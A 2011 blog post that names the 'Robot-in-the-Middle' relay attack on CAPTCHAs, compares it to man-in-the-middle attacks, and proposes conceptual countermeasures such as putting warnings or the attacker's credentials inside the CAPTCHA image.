Thursday, August 25, 2011

CAPTCHAs and the Robot in the Middle attack

A CAPTCHA is a visual test of humanity used to prevent machines from performing an operation that is intended to be performed only by people. Many internet services use this to prevent mass automatic access to their services. For example, Google requires anyone registering a Gmail account to pass a CAPTCHA test.

The most commonly used CAPTCHA is a request to identify letters that are presented on the screen in a form which is difficult for OCR software to identify - see example on the right.

One way to circumvent CAPTCHAs is to use a Robot-in-the-Middle attack.


In the classic Man-in-the-Middle attack an attacker sits between two legitimate entities and represents himself to each of these entities as his counterpart. One example of a Man-in-the-Middle attack is Schneier's Chess Grandmaster Problem; a bad chess player can break-even against two chess grand-masters by playing them against each other (i.e. the fake player will play black against the first grand-master and white against the second grand-master, playing the first grand-master's moves against the second grandmaster and the second grand-master's moves against the first grand-master). British illusionist Derren Brown did this trick on one of his shows.





In a Robot-in-the-Middle attack against CAPTCHAs the attacker sets up a web-site which requires users to pass a CAPTCHA test - the same tests that the attacker needs to pass to get the desired service from the site under attack.

This attack is well known, though I haven't seen the term "Robot-in-the-Middle" used for it. So this post has two goals - to propose the term "Robot-in-the-Middle" (or RitM) and to suggest possible solutions to this attack.

The most commonly used solution against Man-in-the-Middle attacks is for at least one of the legitimate entities to securely authenticate the other entity in such a way that will authenticate all communications coming from the other entity. A very common example of this is the SSL protocol used to authenticate web-sites. Can such a technique be used against Robot-in-the-Middle?

Seemingly not. The RitM attack is based on the following assumptions:
  1. All information that can be used by the site under attack as part of the challenge is known to the RitM (since the RitM is being asked by the site under attack to respond to this challenge).
  2. The RitM can pass this information on to the human connecting to the RitM.
  3. Any human receiving this information can respond to the challenge
It would seem that these assumptions remain true no matter what we do. So is there no way to defend against a RitM attack?

In fact there are steps one can take to mitigate against such an attack, targeting the second and third assumptions. First, let's note that through the CAPTCHA the site under attack can communicate information to the human responding to the challenge in a way that the RitM can't understand and block. This can be achieved by adding a message to the CAPTCHA graphic and using this message as part of the challenge.

Using this we can attack the second assumption ("the RitM can pass on this information to the human connecting to the RitM")  by creating a challenge with information that the attacker wouldn't want to pass on to the human. For example, this could include the user name and password used by the attacker when signing up for the service.

Likewise we can attack the third assumption ("Any human that receives this information can respond to the challenge")  by creating a challenge that the human wouldn't want to respond to unless the human is actually connecting to the attacked site's service (and not the RitM's service). This could be as simple as having the CAPTCHA state the fact the user is signing up to the attacked site's services or include a request that the human check that her browser has authenticated an SSL certificate from the site under attack.

If you can suggest additional countermeasures against RitM or have anything else to add - please use the comments below.

1 comment: